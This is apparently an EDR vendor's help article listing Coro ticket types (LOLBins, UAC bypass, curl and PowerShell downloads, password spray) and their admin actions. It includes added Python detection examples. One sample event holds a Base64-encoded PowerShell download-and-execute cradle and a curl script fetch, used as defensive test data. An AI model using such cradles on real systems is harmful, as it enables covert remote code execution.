Ticket types for Endpoint Detection and Response (EDR)

Important

The tickets discussed in this article apply to devices running Windows or macOS Agents.

Note

To view additional information about Coro tickets, see Using the Ticket Log.

Coro creates tickets when it detects malicious processes that match the following detection rules:

Command and Control

Attackers use command and control techniques to control compromised devices, steal data, spread malware, or build botnets. They send commands and receive stolen data through command and control servers. Coro detects these activities and creates tickets for the following command and control rules:

Remote Access Tool Attack

Coro detects remote access tools on devices. Attackers often install and activate these tools covertly to gain unauthorized network access or expose private services. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Suspicious Usage of a LOLBin

Coro detects Living Off The Land Binaries (LOLBins) on devices. Attackers exploit these legitimate system tools to download or execute malicious activity while mimicking normal system processes. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Credential Access

Attackers use credential access techniques to steal or misuse login credentials and gain unauthorized access to data or devices. Coro detects these attempts and creates tickets for the following credential access rules:

Brute force attempt using a non-existent username

Coro detects suspicious account activity on one or more devices. This activity suggests attempts to manipulate accounts or brute force user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Repeated brute force attempts using wrong passwords

Coro detects suspicious account activity on one or more devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials and potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Defense Evasion

Attackers use defense evasion techniques to avoid detection and bypass security mechanisms. Coro detects these attempts and creates tickets for the following defense evasion rules:

Malicious UAC Bypass

Coro detects User Account Control (UAC) bypasses on devices. Attackers use UAC bypass techniques to gain elevated system privileges. Coro keeps the tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Execution of a renamed tool

Coro detects renamed tools on devices. Attackers use this masquerading technique to avoid detection. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Discovery

Attackers use discovery techniques to gather information about the devices, networks, or infrastructure they’ve infiltrated. Coro detects these actions and creates tickets for the following discovery rules:

Unauthorized System Discovery Activity

Coro detects use of the whoami command on devices. Attackers often run this command during system discovery to identify user accounts and privileges. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Execution

Attackers use execution techniques to run malicious code on target devices or networks. Coro detects these attempts and creates tickets for the following execution rules:

Malicious File Download and/or Execution

Coro detects use of curl commands on devices. Attackers often use curl to download and remotely execute payloads, enabling discreet transfer and execution of malicious files. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Malicious PowerShell Download from External Source

Coro detects PowerShell execution with signs of file download attempts on devices. Attackers often exploit PowerShell’s scripting capabilities to covertly download and execute malicious payloads. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Malicious Base64-Encoded PowerShell Command Usage

Coro detects Base64-encoded PowerShell commands on devices. Attackers often use Base64 encoding to hide malicious scripts from detection tools. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.
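The following is an added example, not Coro's detection code, showing how the three Execution rules above (curl download, PowerShell download, Base64-encoded PowerShell) together with the whoami discovery rule and the renamed-tool rule from earlier sections can be matched against process-creation telemetry. The event field names (image, original_filename, command_line) and the sample events are assumptions constructed for the example.

```python
"""Rule matchers over constructed process-creation events, modelled on the EDR
rules described on this page (whoami discovery, curl download, PowerShell download,
Base64-encoded PowerShell, renamed tool). Added illustration only: this is not
Coro's detection code, and the event field names are assumed."""
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell", "pwsh"}
# Cues that a PowerShell command line fetches content from a remote source.
DOWNLOAD_CUES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, accepting Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_powershell_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent or
    undecodable. PowerShell expects Base64 over UTF-16LE text."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def classify(event):
    """Return the names of the page's rules that the event triggers (possibly several)."""
    image = basename(event.get("image", ""))
    original = event.get("original_filename", "").lower()
    cmd = event.get("command_line", "")
    hits = []
    if image in ("whoami.exe", "whoami") or original == "whoami.exe":
        hits.append("Unauthorized System Discovery Activity")
    if image in ("curl.exe", "curl") and re.search(r"https?://", cmd, re.IGNORECASE):
        hits.append("Malicious File Download and/or Execution")
    if image in POWERSHELL:
        decoded = decode_powershell_command(cmd)
        if decoded is not None:
            hits.append("Malicious Base64-Encoded PowerShell Command Usage")
        # Inspect the decoded script too; otherwise the encoding hides the download cue.
        if DOWNLOAD_CUES.search(cmd) or (decoded and DOWNLOAD_CUES.search(decoded)):
            hits.append("Malicious PowerShell Download from External Source")
    # Renamed tool: the binary's embedded original filename disagrees with its on-disk name.
    if original and original != image:
        hits.append("Execution of a renamed tool")
    return hits


def encode_powershell(script):
    """Encode text the way -EncodedCommand expects (UTF-16LE, then Base64);
    used here only to build the constructed sample event below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\whoami.exe", "original_filename": "whoami.exe",
     "command_line": "whoami /priv"},
    {"image": "/usr/bin/curl", "original_filename": "",
     "command_line": "curl -fsSL https://example.invalid/setup.sh -o /tmp/setup.sh"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')")},
    {"image": r"C:\Users\Public\svc.exe", "original_filename": "whoami.exe",
     "command_line": "svc.exe /all"},
    {"image": r"C:\Windows\System32\notepad.exe", "original_filename": "NOTEPAD.EXE",
     "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event), "<-", event["command_line"][:72])
```

Decoding the encoded command before matching is what lets the download rule fire on the third event; matching the raw command line alone would only raise the Base64 ticket.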

Initial Access

Attackers use initial access techniques to gain entry into a network or device. Coro detects these attempts and creates tickets for Remote Access Tool Attacks.

Persistence

Attackers use persistence techniques to maintain long-term control of a device or network, often stealthily. Coro detects these actions and creates tickets for the following persistence rules:

Malicious Scheduled Task Creation/Execution

Coro detects scheduled task creation or execution on devices, which might indicate that attackers are attempting to gain persistence or execute malicious code at predetermined times. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Modification of User Accounts in Elevated Groups

Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Password spray attack involving 200 login attempts

Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.

Password spray attack involving 100 login attempts

Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.
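The following is an added example, not Coro's detection logic, that triages a batch of failed-logon records into the credential tickets this page names: the two Credential Access rules (non-existent username, repeated wrong passwords) and the two password spray tickets above at their 100- and 200-attempt thresholds. The record fields, the single-window batching and every threshold other than 100/200 are assumptions; the sample records are constructed.

```python
"""Failed-logon triage over constructed records, raising the credential tickets this
page describes: brute force with a non-existent username, repeated wrong passwords,
and password spray at the 100- and 200-attempt thresholds. Added illustration only,
not Coro's detection logic; the record fields, the window and every threshold other
than 100/200 are assumed."""
from collections import Counter, defaultdict

# NTSTATUS values that Windows reports for failed logons (event ID 4625).
STATUS_NO_SUCH_USER = "0xC0000064"
STATUS_WRONG_PASSWORD = "0xC000006A"
NOSUCH_THRESHOLD = 5        # assumed: unknown-username failures per source
REPEAT_THRESHOLD = 10       # assumed: wrong-password failures against one account
SPRAY_MIN_ACCOUNTS = 10     # assumed: distinct accounts before "spray" applies
SPRAY_TIERS = (200, 100)    # the page's two password spray tickets, highest first


def evaluate(records):
    """Return sorted (rule, host, source_ip) tickets for one batch of failed logons.
    The batch is assumed to cover a single evaluation window."""
    tickets = set()
    by_source = defaultdict(list)
    for rec in records:
        by_source[(rec["host"], rec["src"])].append(rec)
    for (host, src), recs in by_source.items():
        no_such_user = sum(r["status"] == STATUS_NO_SUCH_USER for r in recs)
        wrong_pw = Counter(r["account"] for r in recs if r["status"] == STATUS_WRONG_PASSWORD)
        if no_such_user >= NOSUCH_THRESHOLD:
            tickets.add(("Brute force attempt using a non-existent username", host, src))
        if wrong_pw and max(wrong_pw.values()) >= REPEAT_THRESHOLD:
            tickets.add(("Repeated brute force attempts using wrong passwords", host, src))
        # Spray: many accounts, few guesses each. Report only the highest tier reached.
        if len(wrong_pw) >= SPRAY_MIN_ACCOUNTS:
            total = sum(wrong_pw.values())
            for tier in SPRAY_TIERS:
                if total >= tier:
                    tickets.add((f"Password spray attack involving {tier} login attempts", host, src))
                    break
    return sorted(tickets)


def sample_records():
    """Constructed failed-logon records (not real telemetry); sources are RFC 5737 test addresses."""
    rows = []
    # One wrong password against each of 150 accounts: a spray at the 100 tier.
    rows += [("ws01", "203.0.113.7", f"user{i:03d}", STATUS_WRONG_PASSWORD) for i in range(150)]
    # Twelve guesses at one account, plus six usernames that do not exist.
    rows += [("ws02", "198.51.100.9", "admin", STATUS_WRONG_PASSWORD)] * 12
    rows += [("ws02", "198.51.100.9", f"ghost{i}", STATUS_NO_SUCH_USER) for i in range(6)]
    # A user mistyping their password twice: below every threshold.
    rows += [("ws03", "192.0.2.5", "alice", STATUS_WRONG_PASSWORD)] * 2
    return [dict(zip(("host", "src", "account", "status"), row)) for row in rows]


if __name__ == "__main__":
    for rule, host, src in evaluate(sample_records()):
        print(f"{host} {src}: {rule}")
```

The spray check keys on account breadth, not on any single account's count, which is why the 150-account source raises the spray ticket without also raising the repeated-wrong-password ticket.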

Privilege Escalation

Attackers use privilege escalation techniques to gain higher-level permissions on a device or network after initial access. Coro detects these attempts and creates tickets for the following privilege escalation events:

Elevated group adding and removal

Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.

Actions and outcomes:

Close ticket (Open tickets only): Closes the ticket and does not take any remediation action.
  Note: When a device is removed from protection, all open tickets associated with the device are automatically closed.
Re-open (Closed tickets only): Reopens the ticket for admin user intervention and manual remediation.
Reboot devices: Reboots the affected device(s). For further information, see EDR Processes.
Shut down devices: Shuts down the affected device(s). For further information, see EDR Processes.
Un-log and remove from audit reports (Closed tickets only): Removes the ticket from your workspace status update emails.
  Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails.
Block process: Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes.
Isolate affected devices from network: Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes.